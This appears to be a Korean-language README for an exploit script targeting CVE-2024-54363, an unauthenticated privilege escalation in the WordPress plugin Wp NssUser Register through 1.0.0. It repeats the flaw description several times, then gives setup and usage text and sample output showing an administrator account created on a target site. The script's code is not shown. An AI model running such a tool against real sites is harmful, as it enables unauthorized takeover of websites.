
nssTheme Wp NssUser Register의 잘못된 권한 할당 취약점으로 인해 권한 상승이 가능합니다. 이 문제는 Wp NssUser Register: n/a부터 1.0.0까지 영향을 미칩니다.
부적절한 권한 할당 취약점이 nssTheme Wp NssUser Register에 존재하여 권한 상승을 허용합니다. 이 문제는 Wp NssUser Register의 n/a부터 1.0.0까지 영향을 미칩니다.
WordPress용 nssTheme Wp NssUser Register 플러그인은 부적절한 권한 할당 문제에 취약하여 권한 상승으로 이어집니다. 이 취약점을 통해 공격자는 적절한 인증 없이 관리자 권한으로 새 사용자를 등록할 수 있습니다. 이 문제는 플러그인 버전 1.0.0까지 영향을 미칩니다.
Wp NssUser Register1.0.0까지/wp-admin/admin-ajax.php 엔드포인트에 접근 가능pip install -r requirements.txt
usage: CVE-2024-54363.py [-h] -u URL
Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
The site http://target-wordpress-site.com is vulnerable. Exploitation in progress...
Exploitation successful!
Username: nxploit123
Password: nxploit
이 스크립트는 교육 목적으로만 제공됩니다. 작성자는 이 스크립트의 오용으로 인해 발생하는 모든 손해에 대해 책임을 지지 않습니다.